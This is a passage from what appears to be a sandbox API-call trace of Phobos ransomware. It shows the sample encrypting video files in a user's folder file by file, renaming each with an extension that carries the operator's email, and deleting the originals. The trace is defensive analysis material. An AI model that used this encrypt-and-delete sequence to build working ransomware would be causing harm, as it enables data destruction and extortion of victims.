pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.386] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.386] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.386] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.386] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.386] CloseHandle (hObject=0x140) returned 1 [0199.386] CloseHandle (hObject=0x174) returned 1 [0199.386] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\AmiaAp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\amiaap.mkv")) returned 1 [0199.387] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BOq3Wo3BToA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\boq3wo3btoa.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.392] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=65968) returned 1 [0199.392] CloseHandle (hObject=0x174) returned 1 [0199.392] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BOq3Wo3BToA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\boq3wo3btoa.mp4")) returned 0x20 [0199.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BOq3Wo3BToA.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\boq3wo3btoa.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BOq3Wo3BToA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\boq3wo3btoa.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.393] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.393] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BOq3Wo3BToA.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\boq3wo3btoa.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.394] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0199.394] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.394] ReadFile (in: hFile=0x174, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x101b0, lpOverlapped=0x0) returned 1 [0199.395] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x101c0, dwBufLen=0x101c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x101c0) returned 1 [0199.396] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x101c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x101c0, lpOverlapped=0x0) returned 1 [0199.397] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32b68) returned 1 [0199.397] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.397] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.397] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.397] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.397] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.397] CloseHandle (hObject=0x174) returned 1 [0199.397] CloseHandle (hObject=0x140) returned 1 [0199.398] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BOq3Wo3BToA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\boq3wo3btoa.mp4")) returned 1 [0199.399] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\-NhRwcL QwSFS2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\-nhrwcl qwsfs2.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.402] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=53740) returned 1 [0199.402] CloseHandle (hObject=0x140) returned 1 [0199.402] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\-NhRwcL QwSFS2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\-nhrwcl qwsfs2.avi")) returned 0x20 [0199.402] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\-NhRwcL QwSFS2.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\-nhrwcl qwsfs2.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\-NhRwcL QwSFS2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\-nhrwcl qwsfs2.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.402] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.402] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\-NhRwcL QwSFS2.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\-nhrwcl qwsfs2.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.403] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0199.403] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.403] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd1ec, lpOverlapped=0x0) returned 1 [0199.405] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd1f0, dwBufLen=0xd1f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd1f0) returned 1 [0199.406] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd1f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd1f0, lpOverlapped=0x0) returned 1 [0199.407] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32b68) returned 1 [0199.407] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.407] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0199.407] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.408] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0199.408] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.408] CloseHandle (hObject=0x140) returned 1 [0199.408] CloseHandle (hObject=0x174) returned 1 [0199.408] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\-NhRwcL QwSFS2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\-nhrwcl qwsfs2.avi")) returned 1 [0199.409] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\3OsrId5CUQXb3t0G_L.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\3osrid5cuqxb3t0g_l.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.410] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=53451) returned 1 [0199.410] CloseHandle (hObject=0x174) returned 1 [0199.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\3OsrId5CUQXb3t0G_L.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\3osrid5cuqxb3t0g_l.mp4")) returned 0x20 [0199.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\3OsrId5CUQXb3t0G_L.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\3osrid5cuqxb3t0g_l.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\3OsrId5CUQXb3t0G_L.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\3osrid5cuqxb3t0g_l.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.410] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.411] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\3OsrId5CUQXb3t0G_L.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\3osrid5cuqxb3t0g_l.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.411] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0199.411] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.411] ReadFile (in: hFile=0x174, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd0cb, lpOverlapped=0x0) returned 1 [0199.413] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0d0, dwBufLen=0xd0d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0d0) returned 1 [0199.413] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0d0, lpOverlapped=0x0) returned 1 [0199.415] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32b68) returned 1 [0199.415] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.415] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0199.415] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.415] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0199.415] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.415] CloseHandle (hObject=0x174) returned 1 [0199.415] CloseHandle (hObject=0x140) returned 1 [0199.415] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\3OsrId5CUQXb3t0G_L.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\3osrid5cuqxb3t0g_l.mp4")) returned 1 [0199.416] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\4KWxMN45S.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\4kwxmn45s.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.417] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8321) returned 1 [0199.417] CloseHandle (hObject=0x140) returned 1 [0199.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\4KWxMN45S.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\4kwxmn45s.flv")) returned 0x20 [0199.418] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\4KWxMN45S.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\4kwxmn45s.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\4KWxMN45S.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\4kwxmn45s.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.418] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.418] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\4KWxMN45S.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\4kwxmn45s.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.419] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0199.419] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.419] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2081, lpOverlapped=0x0) returned 1 [0199.420] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2090, dwBufLen=0x2090 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2090) returned 1 [0199.420] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2090, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2090, lpOverlapped=0x0) returned 1 [0199.421] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32b68) returned 1 [0199.421] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.421] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.421] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.421] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.421] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.421] CloseHandle (hObject=0x140) returned 1 [0199.421] CloseHandle (hObject=0x174) returned 1 [0199.421] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\4KWxMN45S.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\4kwxmn45s.flv")) returned 1 [0199.473] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qDCtLouEPjR9.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qdctlouepjr9.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.474] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=90477) returned 1 [0199.474] CloseHandle (hObject=0x178) returned 1 [0199.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qDCtLouEPjR9.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qdctlouepjr9.flv")) returned 0x20 [0199.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qDCtLouEPjR9.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qdctlouepjr9.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qDCtLouEPjR9.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qdctlouepjr9.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.474] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.474] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qDCtLouEPjR9.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qdctlouepjr9.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.475] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.475] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.475] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1616d, lpOverlapped=0x0) returned 1 [0199.478] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16170, dwBufLen=0x16170 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16170) returned 1 [0199.478] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x16170, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x16170, lpOverlapped=0x0) returned 1 [0199.481] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0199.481] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.481] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0199.481] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.481] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0199.481] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.481] CloseHandle (hObject=0x178) returned 1 [0199.481] CloseHandle (hObject=0x16c) returned 1 [0199.482] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qDCtLouEPjR9.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qdctlouepjr9.flv")) returned 1 [0199.484] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qqsa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qqsa.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.485] GetFileSizeEx (in: hFile=0x16c, 